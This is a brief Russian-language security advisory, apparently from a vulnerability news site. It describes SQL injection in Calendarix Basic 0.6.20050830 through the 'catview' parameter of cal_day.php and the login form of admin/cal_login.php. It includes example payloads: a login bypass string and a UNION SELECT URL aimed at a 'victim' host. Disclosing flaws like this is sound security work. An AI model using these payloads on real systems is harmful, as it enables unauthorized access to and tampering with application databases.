Программа: Calendarix Basic 0.6.20050830, возможно более ранние версии

Уязвимость существует из-за недостаточной обработки входных данных в параметре "catview"
в сценарии "cal_day.php" в параметре "login" в сценарии "admin/cal_login.php".
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Пример:

Link: http://victim/calendarix/admin/cal_login.php
username: ‘ or 1/*
password: any

http://victim/calendarix/cal_day.php? op=day&date=2006-01-10 &catview=99%
20union%20select% 2012345
 



Оставить мнение